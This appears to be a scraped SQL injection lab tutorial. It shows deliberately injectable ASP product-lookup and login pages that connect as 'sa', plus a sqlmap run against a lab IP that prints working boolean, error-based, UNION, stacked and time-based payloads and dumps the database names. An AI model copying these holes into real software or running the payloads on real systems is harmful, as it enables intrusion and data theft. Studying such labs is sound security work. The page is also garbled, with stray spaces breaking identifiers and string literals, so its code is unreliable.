<%
02
03 dim prodId
04 prodId = Request. QueryString ("id ")
05
06 set conn = server. createObject ("ADODB. Connection ")
07 set rs = server. createObject ("ADODB. Recordset ")
08
09 query = "select prodName from products where id =" & prodId
10
11 conn. Open "Provider = SQLOLEDB; Data Source = (local); Initial Catalog = database; User Id = sa; Password = Password"
12 rs. activeConnection = conn
13 rs. open query
14
15 if not rs. eof then
16 response. write "Got product" & rs. fields ("prodName"). value
17 else
18 response. write "No product found"
19 end if
20
21%>
SQL statement: Create a database and query
1 create table products
2 (
3 id int identity (1, 1) not null,
4 prodName varchar (50) not null,
5)
6
7 insert into products (prodName) values ('1 ')
8 insert into products (prodName) values ('2 ')
9 insert into products (prodName) values ('3 ')
01 root @ Dis9Team:/pen # sqlmap-u "http: // 5.5.5.134/SQL. asp? Id = 1 "-- dbs
02
03 sqlmap/1.0-dev (r4911)-automatic SQL injection and database takeover tool
04 http://www.bkjia.com
05
06 [!] Legal disclagal: usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program
07
08 [*] starting at 13:10:54
09
10 [13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.134/session' as session file
11 [13:10:55] [INFO] resuming back-end DBMS 'Microsoft SQL server 100' from session file
12 [13:10:55] [INFO] testing connection to the target url
13 [13:10:55] [INFO] heuristics detected web page charset 'ascii'
14 sqlmap identified the following injection points with a total of 0 HTTP (s) requests:
15 ---
16 Place: GET
17 Parameter: id
18 Type: boolean-based blind
19 Title: AND boolean-based blind-WHERE or HAVING clause
20 Payload: id = 1 AND 2431 = 2431
21
22 Type: error-based
23 Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
24 Payload: id = 1 AND 5223 = CONVERT (INT, (CHAR (58) + CHAR (106) + CHAR (107) + CHAR (99) + CHAR (58) + (SELECT (case when (5223 = 5223) then char (49) else char (48) END) + CHAR (58) + CHAR (111) + CHAR (107) + CHAR (122) + CHAR (58 )))
25
26 Type: UNION query
27 Title: Generic UNION query (NULL)-1 column
28 Payload: id =-3220 union select char (58) + CHAR (106) + CHAR (107) + CHAR (99) + CHAR (58) + CHAR (107) + CHAR (102) + CHAR (75) + CHAR (122) + CHAR (97) + CHAR (84) + CHAR (120) + CHAR (83) + CHAR (79) + CHAR (83) + CHAR (58) + CHAR (111) + CHAR (107) + CHAR (122) + CHAR (58 )--
29
30 Type: stacked queries
31 Title: Microsoft SQL Server/Sybase stacked queries
32 Payload: id = 1; waitfor delay '0: 0: 5 ';--
33
34 Type: AND/OR time-based blind
35 Title: Microsoft SQL Server/Sybase time-based blind
36 Payload: id = 1 waitfor delay '0: 0: 5 '--
37 ---
38
39 [13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
40 web server operating system: Windows XP
41 web application technology: ASP, Microsoft IIS 5.1
42 back-end DBMS: Microsoft SQL Server 2005
43 [13:10:55] [INFO] fetching database names
44 [13:10:55] [INFO] the SQL query used returns 5 entries
45 [13:10:55] [INFO] retrieved: "master"
46 [13:10:55] [INFO] retrieved: "model"
47 [13:10:55] [INFO] retrieved: "msdb"
48 [13:10:55] [INFO] retrieved: "myDB"
49 [13:10:55] [INFO] retrieved: "tempdb"
50 available databases [5]:
51 [*] master
52 [*] model
53 [*] msdb
54 [*] myDB
55 [*] tempdb
56
57 [13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'
58
59 [*] shutting down at 13:10:55
60
61 root @ Dis9Team:/pen #
1 ----------------------------------------------------- great split line --
2 post SQL
3 SQL:
01 <PRE class = "brush: php; toolbar: true; auto-links: true;"> create table users
02 (
03 userId int identity (1, 1) not null,
04 userName varchar (50) not null,
05 userPass varchar (20) not null
06)
07
08 insert into users (userName, userPass) values ('john', 'doe ')
09 insert into users (userName, userPass) values ('admin', 'wwz04ff ')
10 insert into users (userName, userPass) values ('fsmith ', 'mypassword') </PRE>
View source
Print?
1 asp:
View source
Print?
01 <PRE class = "brush: php; toolbar: true; auto-links: true;"> <%
02 dim userName, password, query
03 dim conn, rS
04
05 userName = Request. Form ("userName ")
06 password = Request. Form ("password ")
07
08 set conn = server. createObject ("ADODB. Connection ")
09 set rs = server. createObject ("ADODB. Recordset ")
10
11 query = "select count (*) from users where userName = '"&
12 userName & "'and userPass ='" & password &"'"
13
14 conn. Open "Provider = SQLOLEDB; Data Source = (local );
15 Initial Catalog = myDB; User Id = sa; Password ="
16 rs. activeConnection = conn
17 rs. open query
18
19 if not rs. eof then
20 response. write "Logged In"
21 else
22 response. write "Bad Credentials"
23 end if
24%>
</PRE> HTML submission form: <PRE class = "brush: php; toolbar: true; auto-links: true; "> <DIV class =" postmessage firstpost "> <PRE class =" brush: php; toolbar: true; auto-links: true; "> <form name =" frmLogin "action =" ASP. asp "method =" post ">
25 Username: <input type = "text" name = "userName">
26 Password: <input type = "text" name = "password">
27 <input type = "submit">
28 </form> </PRE> </DIV>
29 </PRE>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
